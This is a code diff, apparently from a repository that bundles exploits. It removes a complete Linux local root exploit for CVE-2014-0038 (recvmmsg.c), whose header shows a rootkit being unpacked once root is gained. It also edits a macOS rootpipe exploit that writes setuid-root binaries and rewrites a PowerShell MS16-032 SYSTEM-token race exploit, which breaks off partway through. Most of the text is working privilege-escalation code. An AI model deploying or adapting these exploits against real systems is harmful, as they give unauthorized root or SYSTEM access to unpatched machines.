+	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
+	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
+	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
+	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
+};
+
+#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
+#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
+int main(void)
+{
+
+	unsigned long eax, ebx, ecx, edx;
+	unsigned long i;
+
+	cpuid(0);
+	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
+
+	cpuid(1);
+	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
+			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
+	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
+			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
+
+	fprintf(stdout, "FLAGS:");
+	for (i=0 ; i<32 ; i++)
+		if (edx & (1 << i))
+			fprintf(stdout, " %s", featureinfo[i]);
+
+	for (i=0 ; i<32 ; i++)
+		if (ecx & (1 << i))
+			fprintf(stdout, " %s", extendinfo[i]);
+
+	fprintf(stdout, "\n");
+	fflush(stdout);
+
+	return 0;
+}
+

data/exploits/CVE-2014-0038/recvmmsg.c

@@ -1,226 +0,0 @@
-/* 
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
-CVE-2014-0038 / x32 ABI with recvmmsg
-by rebel @ irc.smashthestack.org
------------------------------------
-
-takes about 13 minutes to run because timeout->tv_sec is decremented
-once per second and 0xff*3 is 765.
-
-some things you could do while waiting:
-  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
-  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
-  * brew some coffee
-  * stare at the countdown giggly with anticipation
-
-could probably whack the high bits of some pointer with nanoseconds,
-but that would require a bunch of nulls before the pointer and then
-reading an oops from dmesg which isn't that elegant.
-
-&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
-
-hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
-anyway..
-
-same principle will work on 32bit but I didn't really find any major
-distros shipping with CONFIG_X86_X32=y
-
-user@ubuntu:~$ uname -a
-Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
-user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
-user@ubuntu:~$ ./recvmmsg
-byte 3 / 3.. ~0 secs left.     
-w00p w00p!
-# id
-uid=0(root) gid=0(root) groups=0(root)
-# sh phalanx-2.6b-x86_64.sh
-unpacking..
-
-:)=
-
-greets to my homeboys kaliman, beist, capsl & all of #social
-
-Sat Feb  1 22:15:19 CET 2014
-% rebel %
-*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
-*/
-
-#define _GNU_SOURCE
-#include <netinet/ip.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/socket.h>
-#include <unistd.h>
-#include <sys/syscall.h>
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-#include <fcntl.h>
-#include <sys/utsname.h>
-
-#define __X32_SYSCALL_BIT 0x40000000
-#undef __NR_recvmmsg
-#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
-#define VLEN 1
-#define BUFSIZE 200
-
-int port;
-
-struct offset {
-    char *kernel_version;
-    unsigned long dest; // net_sysctl_root + 96
-    unsigned long original_value; // net_ctl_permissions
-    unsigned long prepare_kernel_cred;
-    unsigned long commit_creds;
-};
-
-struct offset offsets[] = {
-    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
-    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
-    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
-    {NULL,0,0,0,0}
-};
-
-void udp(int b) {
-    int sockfd;
-    struct sockaddr_in servaddr,cliaddr;
-    int s = 0xff+1;
-
-    if(fork() == 0) {
-        while(s > 0) {
-            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
-            sleep(1);
-            s--;
-            fprintf(stderr,".");
-        }
-
-        sockfd = socket(AF_INET,SOCK_DGRAM,0);
-        bzero(&servaddr,sizeof(servaddr));
-        servaddr.sin_family = AF_INET;
-        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
-        servaddr.sin_port=htons(port);
-        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
-        exit(0);
-    }
-
-}
-
-void trigger() {
-    open("/proc/sys/net/core/somaxconn",O_RDONLY);
-
-    if(getuid() != 0) {
-        fprintf(stderr,"not root, ya blew it!\n");
-        exit(-1);
-    }
-
-    fprintf(stderr,"w00p w00p!\n");
-    system("/bin/sh -i");
-}
-
-typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
-_commit_creds commit_creds;
-_prepare_kernel_cred prepare_kernel_cred;
-
-// thx bliss
-static int __attribute__((regparm(3)))
-getroot(void *head, void * table)
-{
-    commit_creds(prepare_kernel_cred(0));
-    return -1;
-}
-
-void __attribute__((regparm(3)))
-trampoline()
-{
-    asm("mov $getroot, %rax; call *%rax;");
-}
-
-int main(void)
-{
-    int sockfd, retval, i;
-    struct sockaddr_in sa;
-    struct mmsghdr msgs[VLEN];
-    struct iovec iovecs[VLEN];
-    char buf[BUFSIZE];
-    long mmapped;
-    struct utsname u;
-    struct offset *off = NULL;
-
-    uname(&u);
-
-    for(i=0;offsets[i].kernel_version != NULL;i++) {
-        if(!strcmp(offsets[i].kernel_version,u.release)) {
-            off = &offsets[i];
-            break;
-        }
-    }
-
-    if(!off) {
-        fprintf(stderr,"no offsets for this kernel version..\n");
-        exit(-1);
-    }
-
-    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
-    mmapped &= 0x000000ffffffffff;
-
-        srand(time(NULL));
-    port = (rand() % 30000)+1500;
-
-    commit_creds = (_commit_creds)off->commit_creds;
-    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
-
-    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
-
-    if(mmapped == -1) {
-        perror("mmap()");
-        exit(-1);
-    }
-
-    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
-
-    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
-
-    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
-        perror("mprotect()");
-        exit(-1);
-    }
-    
-    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
-    if (sockfd == -1) {
-        perror("socket()");
-        exit(-1);
-    }
-
-    sa.sin_family = AF_INET;
-    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
-    sa.sin_port = htons(port);
-
-    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
-        perror("bind()");
-        exit(-1);
-    }
-
-    memset(msgs, 0, sizeof(msgs));
-
-    iovecs[0].iov_base = &buf;
-    iovecs[0].iov_len = BUFSIZE;
-    msgs[0].msg_hdr.msg_iov = &iovecs[0];
-    msgs[0].msg_hdr.msg_iovlen = 1;
-
-    for(i=0;i < 3 ;i++) {
-        udp(i);
-        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
-        if(!retval) {
-            fprintf(stderr,"\nrecvmmsg() failed\n");
-        }
-    }
-
-    close(sockfd); 
-
-    fprintf(stderr,"\n");
-
-    trigger();
-}

data/exploits/CVE-2015-1130/exploit.py

@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv
 
 if len(args) != 3:
-    print("usage: exploit.py source_binary dest_binary_as_root")
+    print "usage: exploit.py source_binary dest_binary_as_root"
     sys.exit(-1)
 
 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)
 
-print("will write file", dest_binary)
+print "will write file", dest_binary
 
 if use_old_api():
     adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
     tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
 
 
-print("Done!")
+print "Done!"
 
 del pool

data/exploits/CVE-2016-0099/cve_2016_0099.ps1

@@ -1,371 +1,334 @@
-#function Invoke-MS16-032 {
-<#
-.SYNOPSIS
-    
-    PowerShell implementation of MS16-032. The exploit targets all vulnerable
-    operating systems that support PowerShell v2+. Credit for the discovery of
-    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
-    
-    Targets:
-    
-    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
-    * Tested on x32 Win7, x64 Win8, x64 2k12R2
-    
-    Notes:
-    
-    * In order for the race condition to succeed the machine must have 2+ CPU
-      cores. If testing in a VM just make sure to add a core if needed mkay.
-    * Want to know more about MS16-032 ==>
-      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
+# Copyright (c) 2016, Ruben Booren (@FuzzySec)
+# All rights reserved
+Add-Type -TypeDefinition @"
+    using System;
+    using System.Diagnostics;
+    using System.Runtime.InteropServices;
+    using System.Security.Principal;
 
-.DESCRIPTION
-	Author: Ruben Boonen (@FuzzySec)
-	Blog: http://www.fuzzysecurity.com/
-	License: BSD 3-Clause
-	Required Dependencies: PowerShell v2+
-	Optional Dependencies: None
-    
-.EXAMPLE
-	C:\PS> Invoke-MS16-032
-#>
-	Add-Type -TypeDefinition @"
-	using System;
-	using System.Diagnostics;
-	using System.Runtime.InteropServices;
-	using System.Security.Principal;
-	
-	[StructLayout(LayoutKind.Sequential)]
-	public struct PROCESS_INFORMATION
-	{
-		public IntPtr hProcess;
-		public IntPtr hThread;
-		public int dwProcessId;
-		public int dwThreadId;
-	}
-	
-	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-	public struct STARTUPINFO
-	{
-		public Int32 cb;
-		public string lpReserved;
-		public string lpDesktop;
-		public string lpTitle;
-		public Int32 dwX;
-		public Int32 dwY;
-		public Int32 dwXSize;
-		public Int32 dwYSize;
-		public Int32 dwXCountChars;
-		public Int32 dwYCountChars;
-		public Int32 dwFillAttribute;
-		public Int32 dwFlags;
-		public Int16 wShowWindow;
-		public Int16 cbReserved2;
-		public IntPtr lpReserved2;
-		public IntPtr hStdInput;
-		public IntPtr hStdOutput;
-		public IntPtr hStdError;
-	}
-	
-	[StructLayout(LayoutKind.Sequential)]
-	public struct SQOS
-	{
-		public int Length;
-		public int ImpersonationLevel;
-		public int ContextTrackingMode;
-		public bool EffectiveOnly;
-	}
-	
-	public static class Advapi32
-	{
-		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-		public static extern bool CreateProcessWithLogonW(
-			String userName,
-			String domain,
-			String password,
-			int logonFlags,
-			String applicationName,
-			String commandLine,
-			int creationFlags,
-			int environment,
-			String currentDirectory,
-			ref  STARTUPINFO startupInfo,
-			out PROCESS_INFORMATION processInformation);
-			
-		[DllImport("advapi32.dll", SetLastError=true)]
-		public static extern bool SetThreadToken(
-			ref IntPtr Thread,
-			IntPtr Token);
-			
-		[DllImport("advapi32.dll", SetLastError=true)]
-		public static extern bool OpenThreadToken(
-			IntPtr ThreadHandle,
-			int DesiredAccess,
-			bool OpenAsSelf,
-			out IntPtr TokenHandle);
-			
-		[DllImport("advapi32.dll", SetLastError=true)]
-		public static extern bool OpenProcessToken(
-			IntPtr ProcessHandle, 
-			int DesiredAccess,
-			ref IntPtr TokenHandle);
-			
-		[DllImport("advapi32.dll", SetLastError=true)]
-		public extern static bool DuplicateToken(
-			IntPtr ExistingTokenHandle,
-			int SECURITY_IMPERSONATION_LEVEL,
-			ref IntPtr DuplicateTokenHandle);
-	}
-	
-	public static class Kernel32
-	{
-		[DllImport("kernel32.dll")]
-		public static extern uint GetLastError();
-	
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern IntPtr GetCurrentProcess();
-	
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern IntPtr GetCurrentThread();
-		
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern int GetThreadId(IntPtr hThread);
-		
-		[DllImport("kernel32.dll", SetLastError = true)]
-		public static extern int GetProcessIdOfThread(IntPtr handle);
-		
-		[DllImport("kernel32.dll",SetLastError=true)]
-		public static extern int SuspendThread(IntPtr hThread);
-		
-		[DllImport("kernel32.dll",SetLastError=true)]
-		public static extern int ResumeThread(IntPtr hThread);
-		
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern bool TerminateProcess(
-			IntPtr hProcess,
-			uint uExitCode);
-	
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern bool CloseHandle(IntPtr hObject);
-		
-		[DllImport("kernel32.dll", SetLastError=true)]
-		public static extern bool DuplicateHandle(
-			IntPtr hSourceProcessHandle,
-			IntPtr hSourceHandle,
-			IntPtr hTargetProcessHandle,
-			ref IntPtr lpTargetHandle,
-			int dwDesiredAccess,
-			bool bInheritHandle,
-			int dwOptions);
-	}
-	
-	public static class Ntdll
-	{
-		[DllImport("ntdll.dll", SetLastError=true)]
-		public static extern int NtImpersonateThread(
-			IntPtr ThreadHandle,
-			IntPtr ThreadToImpersonate,
-			ref SQOS SecurityQualityOfService);
-	}
+    [StructLayout(LayoutKind.Sequential)]
+    public struct PROCESS_INFORMATION
+    {
+        public IntPtr hProcess;
+        public IntPtr hThread;
+        public int dwProcessId;
+        public int dwThreadId;
+    }
+
+    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+    public struct STARTUPINFO
+    {
+        public Int32 cb;
+        public string lpReserved;
+        public string lpDesktop;
+        public string lpTitle;
+        public Int32 dwX;
+        public Int32 dwY;
+        public Int32 dwXSize;
+        public Int32 dwYSize;
+        public Int32 dwXCountChars;
+        public Int32 dwYCountChars;
+        public Int32 dwFillAttribute;
+        public Int32 dwFlags;
+        public Int16 wShowWindow;
+        public Int16 cbReserved2;
+        public IntPtr lpReserved2;
+        public IntPtr hStdInput;
+        public IntPtr hStdOutput;
+        public IntPtr hStdError;
+    }
+
+    [StructLayout(LayoutKind.Sequential)]
+    public struct SQOS
+    {
+        public int Length;
+        public int ImpersonationLevel;
+        public int ContextTrackingMode;
+        public bool EffectiveOnly;
+    }
+
+    public static class Advapi32
+    {
+        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+        public static extern bool CreateProcessWithLogonW(
+            String userName,
+            String domain,
+            String password,
+            int logonFlags,
+            String applicationName,
+            String commandLine,
+            int creationFlags,
+            int environment,
+            String currentDirectory,
+            ref  STARTUPINFO startupInfo,
+            out PROCESS_INFORMATION processInformation);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool SetThreadToken(
+            ref IntPtr Thread,
+            IntPtr Token);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool OpenThreadToken(
+            IntPtr ThreadHandle,
+            int DesiredAccess,
+            bool OpenAsSelf,
+            out IntPtr TokenHandle);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public static extern bool OpenProcessToken(
+            IntPtr ProcessHandle,
+            int DesiredAccess,
+            ref IntPtr TokenHandle);
+
+        [DllImport("advapi32.dll", SetLastError=true)]
+        public extern static bool DuplicateToken(
+            IntPtr ExistingTokenHandle,
+            int SECURITY_IMPERSONATION_LEVEL,
+            ref IntPtr DuplicateTokenHandle);
+    }
+
+    public static class Kernel32
+    {
+        [DllImport("kernel32.dll")]
+        public static extern uint GetLastError();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern IntPtr GetCurrentProcess();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern IntPtr GetCurrentThread();
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern int GetThreadId(IntPtr hThread);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern int GetProcessIdOfThread(IntPtr handle);
+
+        [DllImport("kernel32.dll",SetLastError=true)]
+        public static extern int SuspendThread(IntPtr hThread);
+
+        [DllImport("kernel32.dll",SetLastError=true)]
+        public static extern int ResumeThread(IntPtr hThread);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool TerminateProcess(
+            IntPtr hProcess,
+            uint uExitCode);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool CloseHandle(IntPtr hObject);
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        public static extern bool DuplicateHandle(
+            IntPtr hSourceProcessHandle,
+            IntPtr hSourceHandle,
+            IntPtr hTargetProcessHandle,
+            ref IntPtr lpTargetHandle,
+            int dwDesiredAccess,
+            bool bInheritHandle,
+            int dwOptions);
+    }
+
+    public static class Ntdll
+    {
+        [DllImport("ntdll.dll", SetLastError=true)]
+        public static extern int NtImpersonateThread(
+            IntPtr ThreadHandle,
+            IntPtr ThreadToImpersonate,
+            ref SQOS SecurityQualityOfService);
+    }
 "@
-	
-	function Get-ThreadHandle {
-		# StartupInfo Struct
-		$StartupInfo = New-Object STARTUPINFO
-		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-		
-		# ProcessInfo Struct
-		$ProcessInfo = New-Object PROCESS_INFORMATION
-		
-		# CreateProcessWithLogonW --> lpCurrentDirectory
-		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName
 
-		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-		$CallResult = [Advapi32]::CreateProcessWithLogonW(
-			"user", "domain", "pass",
-			0x00000002, "C:\Windows\System32\cmd.exe", "",
-			0x00000004, $null, $GetCurrentPath,
-			[ref]$StartupInfo, [ref]$ProcessInfo)
+    function Get-ThreadHandle {
+        # StartupInfo Struct
+        $StartupInfo = New-Object STARTUPINFO
+        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
 
-		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
-		$lpTargetHandle = [IntPtr]::Zero
-		$CallResult = [Kernel32]::DuplicateHandle(
-			$ProcessInfo.hProcess, 0x4,
-			[Kernel32]::GetCurrentProcess(),
-			[ref]$lpTargetHandle, 0, $false,
-			0x00000002)
-		
-		# Clean up suspended process
-		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
-		
-		$lpTargetHandle
-	}
-	
-	function Get-SystemToken {
-		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
-	
-		$CallResult = [Kernel32]::SuspendThread($hThread)
-		if ($CallResult -ne 0) {
-			echo "[!] $hThread is a bad thread, exiting.."
-			Return
-		} echo "[+] Thread suspended"
-		
-		echo "[>] Wiping current impersonation token"
-		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
-		if (!$CallResult) {
-			echo "[!] SetThreadToken failed, exiting.."
-			$CallResult = [Kernel32]::ResumeThread($hThread)
-			echo "[+] Thread resumed!"
-			Return
-		}
-		
-		echo "[>] Building SYSTEM impersonation token"
-		# SecurityQualityOfService struct
-		$SQOS = New-Object SQOS
-		$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
-		$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
-		# Undocumented API's, I like your style Microsoft ;)
-		$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
-		if ($CallResult -ne 0) {
-			echo "[!] NtImpersonateThread failed, exiting.."
-			$CallResult = [Kernel32]::ResumeThread($hThread)
-			echo "[+] Thread resumed!"
-			Return
-		}
-		
-		# Null $SysTokenHandle
-		$script:SysTokenHandle = [IntPtr]::Zero
+        # ProcessInfo Struct
+        $ProcessInfo = New-Object PROCESS_INFORMATION
 
-		# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
-		$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
-		if (!$CallResult) {
-			echo "[!] OpenThreadToken failed, exiting.."
-			$CallResult = [Kernel32]::ResumeThread($hThread)
-			echo "[+] Thread resumed!"
-			Return
-		}
-		
-		echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
-		echo "[+] Resuming thread.."
-		$CallResult = [Kernel32]::ResumeThread($hThread)
-	}
-	
-	# main() <--- ;)
-	$ms16032 = @"
-	 __ __ ___ ___   ___     ___ ___ ___ 
-	|  V  |  _|_  | |  _|___|   |_  |_  |
-	|     |_  |_| |_| . |___| | |_  |  _|
-	|_|_|_|___|_____|___|   |___|___|___|
-	                                    
-	               [by b33f -> @FuzzySec]
-"@
-	
-	$ms16032
-	
-	# Check logical processor count, race condition requires 2+
-	echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
-	if ($([System.Environment]::ProcessorCount) -lt 2) {
-		echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
-		Return
-	}
-	
-	echo "[>] Duplicating CreateProcessWithLogonW handle"
-	$hThread = Get-ThreadHandle
-	
-	# If no thread handle is captured, the box is patched
-	if ($hThread -eq 0) {
-		echo "[!] No valid thread handle was captured, exiting!`n"
-		Return
-	} else {
-		echo "[?] Done, using thread handle: $hThread"
-	} echo "`n[*] Sniffing out privileged impersonation token.."
-	
-	# Get handle to SYSTEM access token
-	Get-SystemToken
-	
-	# If we fail a check in Get-SystemToken, exit
-	if ($SysTokenHandle -eq 0) {
-		Return
-	}
-	
-	echo "`n[*] Sniffing out SYSTEM shell.."
-	echo "`n[>] Duplicating SYSTEM token"
-	$hDuplicateTokenHandle = [IntPtr]::Zero
-	$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
-	
-	# Simple PS runspace definition
-	echo "[>] Starting token race"
-	$Runspace = [runspacefactory]::CreateRunspace()
-	$StartTokenRace = [powershell]::Create()
-	$StartTokenRace.runspace = $Runspace
-	$Runspace.Open()
-	[void]$StartTokenRace.AddScript({
-		Param ($hThread, $hDuplicateTokenHandle)
-		while ($true) {
-			$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
-		}
-	}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
-	$AscObj = $StartTokenRace.BeginInvoke()
-	
-	echo "[>] Starting process race"
-	# Adding a timeout (10 seconds) here to safeguard from edge-cases
-	$SafeGuard = [diagnostics.stopwatch]::StartNew()
-	while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
+        # CreateProcessWithLogonW --> lpCurrentDirectory
+        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
 
-		# StartupInfo Struct
-		$StartupInfo = New-Object STARTUPINFO
-		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
-		
-		# ProcessInfo Struct
-		$ProcessInfo = New-Object PROCESS_INFORMATION
-		
-		# CreateProcessWithLogonW --> lpCurrentDirectory
-		$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
-		
-		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
-		$CallResult = [Advapi32]::CreateProcessWithLogonW(
-			"user", "domain", "pass",
-			0x00000002, $cmd, $args1,
-			0x00000004, $null, $GetCurrentPath,
-			[ref]$StartupInfo, [ref]$ProcessInfo)
-		
-		#---
-		# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-		#---
-		# Missing this check used to cause the exploit to fail sometimes.
-		# If CreateProcessWithLogon fails OpenProcessToken won't succeed
-		# but we obviously don't have a SYSTEM shell :'( . Should be 100%
-		# reliable now!
-		#---
-		if (!$CallResult) {
-			continue
-		}
-			
-		$hTokenHandle = [IntPtr]::Zero
-		$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
-		# If we can't open the process token it's a SYSTEM shell!
-		if (!$CallResult) {
-			echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
-			$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
-			$StartTokenRace.Stop()
-			$SafeGuard.Stop()
-			echo "$end"
-			Return
-		}
-			
-		# Clean up suspended process
-		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
-		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
-		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
+        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+        $CallResult = [Advapi32]::CreateProcessWithLogonW(
+            "user", "domain", "pass",
+            0x00000002, $path1, "",
+            0x00000004, $null, $GetCurrentPath,
+            [ref]$StartupInfo, [ref]$ProcessInfo)
 
-	}
-	
-	# Kill runspace & stopwatch if edge-case
-	$StartTokenRace.Stop()
-	$SafeGuard.Stop()
-#}
+        # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+        $lpTargetHandle = [IntPtr]::Zero
+        $CallResult = [Kernel32]::DuplicateHandle(
+            $ProcessInfo.hProcess, 0x4,
+            [Kernel32]::GetCurrentProcess(),
+            [ref]$lpTargetHandle, 0, $false,
+            0x00000002)
+
+        # Clean up suspended process
+        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+        $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+
+        $lpTargetHandle
+    }
+
+    function Get-SystemToken {
+        echo "`n[?] Trying thread handle: $Thread"
+        echo "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread))).ProcessName)"
+
+        $CallResult = [Kernel32]::SuspendThread($Thread)
+        if ($CallResult -ne 0) {
+            echo "[!] $Thread is a bad thread, moving on.."
+            Return
+        } echo "[+] Thread suspended"
+
+        echo "[>] Wiping current impersonation token"
+        $CallResult = [Advapi32]::SetThreadToken([ref]$Thread, [IntPtr]::Zero)
+        if (!$CallResult) {
+            echo "[!] SetThreadToken failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        echo "[>] Building SYSTEM impersonation token"
+        # SecurityQualityOfService struct
+        $SQOS = New-Object SQOS
+        $SQOS.ImpersonationLevel = 2 #SecurityImpersonation
+        $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
+        # Undocumented API's, I like your style Microsoft ;)
+        $CallResult = [Ntdll]::NtImpersonateThread($Thread, $Thread, [ref]$sqos)
+        if ($CallResult -ne 0) {
+            echo "[!] NtImpersonateThread failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        $script:SysTokenHandle = [IntPtr]::Zero
+        # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
+        $CallResult = [Advapi32]::OpenThreadToken($Thread, 0x0006, $false, [ref]$SysTokenHandle)
+        if (!$CallResult) {
+            echo "[!] OpenThreadToken failed, moving on.."
+            $CallResult = [Kernel32]::ResumeThread($Thread)
+            echo "[+] Thread resumed!"
+            Return
+        }
+
+        echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
+        echo "[+] Resuming thread.."
+        $CallResult = [Kernel32]::ResumeThread($Thread)
+    }
+
+    # main() <--- ;)
+
+    # Check logical processor count, race condition requires 2+
+    echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
+    if ($([System.Environment]::ProcessorCount) -lt 2) {
+        echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
+        Return
+    }
+
+    # Create array for Threads & TID's
